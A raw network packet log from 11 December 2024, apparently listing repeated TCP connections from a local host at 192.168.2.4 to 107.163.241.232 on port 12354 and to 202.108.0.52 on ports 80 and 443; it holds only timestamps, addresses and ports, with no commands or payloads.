                                              Dec 11, 2024 16:27:01.883970976 CET5570480192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:01.895209074 CET5571112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:01.907383919 CET1235455703107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:01.907495975 CET5570312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:01.914329052 CET5570312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:02.009211063 CET8055704202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:02.009248018 CET8053960202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:02.009320974 CET5570480192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:02.009342909 CET5396080192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:02.012631893 CET5570480192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:02.020469904 CET1235455711107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:02.020558119 CET5571112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:02.021382093 CET5571112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:02.038889885 CET1235455703107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:02.132285118 CET8055704202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:02.140923023 CET1235455711107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:03.583384991 CET8055704202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:03.584151983 CET5570480192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:03.586853981 CET57279443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:03.586899042 CET44357279202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:03.587582111 CET57279443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:03.588251114 CET57279443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:03.588263988 CET44357279202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:04.129954100 CET1235455711107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:04.130033970 CET5571112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:04.130657911 CET5571112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:04.130978107 CET5767712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:04.256164074 CET1235455711107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:04.256201029 CET1235457677107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:04.256280899 CET5767712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:04.256886005 CET5767712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:04.378494978 CET1235457677107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:04.418795109 CET1235455703107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:04.418953896 CET5570312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:04.442236900 CET5570312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:04.442990065 CET5809412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:04.561712980 CET1235455703107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:04.562419891 CET1235458094107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:04.562493086 CET5809412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:04.566215038 CET5809412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:04.686110973 CET1235458094107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:05.286931992 CET44357279202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:05.287020922 CET57279443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:05.287731886 CET44357279202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:05.287833929 CET57279443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:05.291572094 CET57279443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:05.291649103 CET44357279202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:05.291728973 CET57279443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:05.403814077 CET5570480192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:05.404120922 CET5880880192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:05.524425983 CET8058808202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:05.524440050 CET8055704202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:05.524744987 CET5880880192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:05.524802923 CET5570480192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:05.546003103 CET5880880192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:05.665457010 CET8058808202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:05.778937101 CET5880880192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:05.778964043 CET5809412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:05.778978109 CET5767712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:05.783847094 CET5914212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:05.892466068 CET5918380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:05.892911911 CET5918412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:05.903280973 CET1235459142107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:05.904576063 CET5914212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:05.904656887 CET5914212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:06.013655901 CET8059183202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:06.013950109 CET1235459184107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:06.014208078 CET5918380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:06.014659882 CET5918412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:06.014713049 CET5918380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:06.015085936 CET5918412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:06.025201082 CET1235459142107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:06.134299994 CET8059183202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:06.134648085 CET1235459184107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:07.694586992 CET8059183202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:07.694645882 CET5918380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:07.699125051 CET60439443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:07.699166059 CET44360439202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:07.699486971 CET60439443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:07.700536966 CET60439443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:07.700553894 CET44360439202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:08.096321106 CET1235459142107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:08.096373081 CET5914212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:08.096642971 CET5914212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:08.097029924 CET6076312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:08.216017008 CET1235459142107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:08.216398954 CET1235460763107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:08.216615915 CET6076312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:08.224733114 CET6076312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:08.236691952 CET1235459184107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:08.236768007 CET5918412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:08.237431049 CET5918412354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:08.237725973 CET6089912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:08.343971968 CET1235460763107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:08.356674910 CET1235459184107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:08.357002020 CET1235460899107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:08.357069016 CET6089912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:08.359719992 CET6089912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:08.481497049 CET1235460899107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:09.404227018 CET44360439202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:09.404469967 CET60439443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:09.405019999 CET44360439202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:09.405380011 CET60439443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:09.410639048 CET60439443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:09.410700083 CET44360439202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:09.410792112 CET60439443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:09.512927055 CET5918380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:09.513365030 CET6217780192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:09.632683992 CET8059183202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:09.632751942 CET8062177202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:09.632803917 CET5918380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:09.632822037 CET6217780192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:09.633472919 CET6217780192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:09.753338099 CET8062177202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:09.807878971 CET6089912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:09.807929993 CET6217780192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:09.808007002 CET6076312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:09.809849024 CET6249612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:09.929353952 CET1235462496107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:09.929439068 CET6249612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:09.947016001 CET6249612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:09.951443911 CET6258612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:09.951857090 CET6258780192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:10.066390991 CET1235462496107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:10.070734024 CET1235462586107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:10.070832014 CET6258612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:10.071291924 CET8062587202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:10.071357012 CET6258780192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:10.071604967 CET6258612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:10.075323105 CET6258780192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:10.192044020 CET1235462586107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:10.195207119 CET8062587202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:11.659782887 CET8062587202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:11.659873962 CET6258780192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:11.663042068 CET63924443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:11.663100004 CET44363924202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:11.663710117 CET63924443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:11.664360046 CET63924443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:11.664377928 CET44363924202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:12.081669092 CET1235462496107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:12.081769943 CET6249612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:12.082072973 CET6249612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:12.082364082 CET6424112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:12.202189922 CET1235462496107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:12.202285051 CET1235464241107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:12.203543901 CET6424112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:12.205312014 CET1235462586107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:12.205382109 CET6258612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:12.209656954 CET6424112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:12.212153912 CET6258612354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:12.223683119 CET6431212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:12.329866886 CET1235464241107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:12.332202911 CET1235462586107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:12.343883991 CET1235464312107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:12.343981981 CET6431212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:12.413908958 CET6431212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:12.533241034 CET1235464312107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:13.361576080 CET44363924202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:13.361670017 CET63924443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:13.362555027 CET44363924202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:13.363126993 CET63924443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:13.366403103 CET63924443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:13.366497993 CET44363924202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:13.366580009 CET63924443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:13.481730938 CET6258780192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:13.482001066 CET6460580192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:13.601392031 CET8064605202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:13.601485014 CET6460580192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:13.601660013 CET8062587202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:13.601720095 CET6258780192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:13.602202892 CET6460580192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:13.721590996 CET8064605202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:13.975049973 CET6460580192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:13.975116014 CET6431212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:13.975121975 CET6424112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:13.977427006 CET6506312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:14.096839905 CET1235465063107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:14.096924067 CET6506312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:14.107498884 CET6506312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:14.119071007 CET6517112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:14.119896889 CET6517380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:14.227078915 CET1235465063107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:14.238534927 CET1235465171107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:14.238631010 CET6517112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:14.238910913 CET6517112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:14.239177942 CET8065173202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:14.239303112 CET6517380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:14.240014076 CET6517380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:14.358241081 CET1235465171107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:14.359400034 CET8065173202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:15.838140965 CET8065173202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:15.840540886 CET6517380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:16.115165949 CET49748443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:16.115190983 CET44349748202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:16.115278006 CET49748443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:16.116113901 CET49748443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:16.116122961 CET44349748202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:16.222589970 CET1235465063107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:16.222657919 CET6506312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:16.227139950 CET6506312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:16.227798939 CET4977812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:16.347203016 CET1235465063107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:16.347873926 CET1235449778107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:16.347942114 CET4977812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:16.348658085 CET4977812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:16.377836943 CET1235465171107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:16.377913952 CET6517112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:16.378103971 CET6517112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:16.378885031 CET4994112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:16.469161987 CET1235449778107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:16.498594999 CET1235465171107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:16.502243042 CET1235449941107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:16.502311945 CET4994112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:16.521610975 CET4994112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:16.641141891 CET1235449941107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:17.806008101 CET44349748202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:17.806337118 CET49748443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:17.806804895 CET44349748202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:17.806868076 CET49748443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:17.810314894 CET49748443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:17.810391903 CET44349748202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:17.810595989 CET44349748202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:17.810645103 CET49748443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:17.810724974 CET49748443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:17.922019005 CET5078980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:17.922224998 CET6517380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:18.043042898 CET8050789202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:18.043154955 CET5078980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:18.043440104 CET8065173202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:18.043590069 CET6517380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:18.043634892 CET5078980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:18.155236959 CET4994112354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:18.155580997 CET4977812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:18.155612946 CET5078980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:18.156507969 CET5090912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:18.162981033 CET8050789202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:18.163059950 CET5078980192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:18.276309967 CET1235450909107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:18.276402950 CET5090912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:18.346874952 CET5090912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:18.359256983 CET5094012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:18.359519005 CET5094180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:18.466813087 CET1235450909107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:18.479346991 CET1235450940107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:18.479429960 CET5094012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:18.479578018 CET8050941202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:18.479645014 CET5094180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:18.479861975 CET5094012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:18.480046988 CET5094180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:18.599395037 CET1235450940107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:18.599443913 CET8050941202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:20.040736914 CET8050941202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:20.040816069 CET5094180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:20.045324087 CET52665443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:20.045373917 CET44352665202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:20.045488119 CET52665443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:20.046305895 CET52665443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:20.046319962 CET44352665202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:20.403445005 CET1235450909107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:20.403527975 CET5090912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:20.403894901 CET5090912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:20.404808044 CET5288312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:20.524050951 CET1235450909107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:20.525322914 CET1235452883107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:20.525393963 CET5288312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:20.526654959 CET5288312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:20.594640970 CET1235450940107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:20.594774961 CET5094012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:20.595320940 CET5094012354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:20.595751047 CET5307912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:20.645884991 CET1235452883107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:20.715888977 CET1235450940107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:20.715919018 CET1235453079107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:20.715984106 CET5307912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:20.720078945 CET5307912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:20.839818954 CET1235453079107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:21.738954067 CET44352665202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:21.739070892 CET52665443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:21.739748955 CET44352665202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:21.739820004 CET52665443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:21.744010925 CET52665443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:21.744091034 CET44352665202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:21.744148016 CET52665443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:21.861171007 CET5094180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:21.862598896 CET5422380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:21.982388020 CET8050941202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:21.982480049 CET5094180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:21.984576941 CET8054223202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:21.984682083 CET5422380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:21.984944105 CET5422380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:22.104217052 CET8054223202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:22.361344099 CET5307912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:22.361485004 CET5288312354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:22.363300085 CET5422380192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:22.481630087 CET5463080192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:22.483007908 CET5463212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:22.497751951 CET5464712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:22.601203918 CET8054630202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:22.601291895 CET5463080192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:22.601758003 CET5463080192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:22.602633953 CET1235454632107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:22.602725029 CET5463212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:22.603682041 CET5463212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:22.617732048 CET1235454647107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:22.617835045 CET5464712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:22.618379116 CET5464712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:22.721636057 CET8054630202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:22.723726034 CET1235454632107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:22.738390923 CET1235454647107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:24.166593075 CET8054630202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:24.166676998 CET5463080192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:24.171778917 CET56120443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:24.171838045 CET44356120202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:24.171895027 CET56120443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:24.172312975 CET56120443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:24.172337055 CET44356120202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:24.722141027 CET1235454632107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:24.722317934 CET5463212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:24.723155022 CET5463212354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:24.723330975 CET5649912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:24.736985922 CET1235454647107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:24.737087011 CET5464712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:24.737637043 CET5464712354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:24.842624903 CET1235454632107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:24.842823982 CET1235456499107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:24.843261957 CET5649912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:24.844077110 CET5649912354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:24.845607996 CET5657812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:24.857203960 CET1235454647107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:24.964389086 CET1235456499107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:24.964972973 CET1235456578107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:24.965204954 CET5657812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:24.965456009 CET5657812354192.168.2.4107.163.241.232
                                              Dec 11, 2024 16:27:25.085499048 CET1235456578107.163.241.232192.168.2.4
                                              Dec 11, 2024 16:27:25.869568110 CET44356120202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:25.869636059 CET56120443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:25.870440960 CET44356120202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:25.870497942 CET56120443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:25.873814106 CET56120443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:25.873868942 CET44356120202.108.0.52192.168.2.4
                                              Dec 11, 2024 16:27:25.873919010 CET56120443192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:25.982763052 CET5463080192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:25.983139992 CET5748180192.168.2.4202.108.0.52
                                              Dec 11, 2024 16:27:26.102735043 CET8057481202.108.0.52192.168.2.4
